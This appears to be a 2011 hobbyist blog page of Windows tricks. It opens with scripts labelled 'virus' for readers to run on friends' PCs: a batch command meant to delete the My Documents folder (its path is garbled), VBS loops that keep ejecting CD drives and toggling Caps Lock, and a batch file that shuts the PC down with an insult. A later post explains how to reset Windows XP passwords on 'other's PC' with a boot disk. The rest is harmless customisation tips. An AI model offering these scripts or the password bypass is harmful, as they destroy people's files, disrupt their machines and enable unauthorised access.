These Rocks...

Wednesday 13 July 2011

Virus coding in notepad batch file programming

Type the following virus code and save it as anything.bat such as virus.bat

It will delete the My document folder of the PC where this program is executed .So don't try this at your PC or try at your own risk .
code - rmdir C:\Documents and Settings \S\Q.
The following code will continuously pop out the CD and DVD drives as many as you have , just copy and paste the following code in notepad and save it as anything.VBS . such as virus.VBS 
code-
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop


This code will toggle the capslock button simultaneously just copy and paste the code and save it as anything.VBS
code- Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop


Convey your friend a little message and shut down his / her computer , just copy and paste the code and save it as anything.BAT
code-
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

to be continued... plz keep visiting

Hacking windows send to menu


How often do you copy songs from a CD? Or some photos from a CD?

What do you do? You select the required files and do a CTRL –C. Open the destination folder and do a CTRL-V. Here is something you can benefit time from. Customize your SEND TO MENU.

This sounds simple and you can do it in less than sixty seconds.
You can create your own BASKET.

First you’ll need access to hidden files. So change your view settings to make all hidden files visible.
Tools -> folder options -> view (tab) and select the show hidden files and folders.
go to parent drive:/documents and settings/(user name)/send to

Open up my computer and locate your most used folders.

Create a shortcut of the most used folders in SEND TO FOLDER.You can do this in a number of ways.

Right click -> send to desktop(create shortcut) and move the shortcut from the desktop to the SEND TO FOLDER

Copy the most used folder and go to SEND TO FOLDER and right click -> paste shortcut.

Also remember to rename the shortcuts to send to videos or send to potos. We don’t need confusion when we use the same later.

5. DONE. 

OVERRIDING MS WINDOWS XP PASSWORD USING ERD COMMANDER. I CANT TELL YOU WHERE TO GET IT BUT GOOGLE CAN.



Hi it’s Debashis Nayak, today I will give you a trick to hack your own or other’s PC to change the password, and reset forgotten password.
If you forgot Ur windows log in password, then don’t worry I have the trick to hack Ur computer to reset password.
Download ERD commander bookable CD, burn the ISO file to a CD, insert the CD into drive and restarts Ur PC. Press F8 (or press other key as per motherboard’s configuration) to go to the boot menu. And select CD-ROM/DVD-ROM (if u has two or more then select the right one) and press enter.
The PC should now start up from CD into ERD Commander. After computer turns on, select the folder where MS XP is installed (c:\windows). A message may arrive, its normal just select OK.
Now go to Start>administrative tool>locksmith.
Follow the wizard; select the account where the password needs to be reset. Enter the new password, and finish the wizard. Restart the PC now u hacked Ur own PC. Enjoy

Accessing hidden theams in windows seven

There are some hidden themes in windows seven , once while i was surfing the c drive's windows folder i got those hidden themes and installed those themes and those worked .But you don't have to search the c drive's windows folder .i am here with a code with which you can go to that folder directly. just go to start > run and type the following code
in run command and hit enter . Code-C:\Windows\Globalization\MCT
and go the folders and install those themes and make your PC more customized .

Creating sortcut for computer lock in Windows 7

hii friends locking windows seven is a long process as compared to a double click , so i am here with a trick so that you can create a lock screen for your windows seven and lock with a shortcut and style. To make a shortcut of lock screen just right click on the desktop click on the create a new shortcut and in the space provided type the following code -rundll32.exe user32.dll, LockWorkStation and click next and give name to the shortcut such as lock, and click finish.now the lock shortcut is created now you can right click on it and go to property and change the icon as you wish. & you can also lock your computer by pressing Start button+L on the keyboard . Don't foget to like this post.

Changing The Colour Scheme of MS Office 2007 with a registry tweak

Friends i know that some of you like me must be bored with the color scheme of ms office 2007. Therefore i have searched the registry to chage the colour scheme of ms office and luck by chance i got . To change the colour scheme you have to go to the start button .
Start > Run > regedit  
after writing "regedit inside the run , hit enter. the Registry editor will open as soon as you hit enter.then navigate the following key-
HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Common 
select the Theme key from the right side , and enter the value of your choice.
1 for blue
2 for silver
3 for black.


you can also change the color of ms office 2007 and 2010 by going to the ms office setting in any of the program such as ms word, ms excel, ms power point .

Monday 11 July 2011

Disabling all system beeps

Hii some of you must hate that irritating PC beeps . there is  tricks to disable the system beeps .
you have to do one simple thing-
go to start > run > regedit

Start Regedit

Go to HKEY_CURRENT_USER\Control Panel\Sound

Edit the key Beep and give it a value of No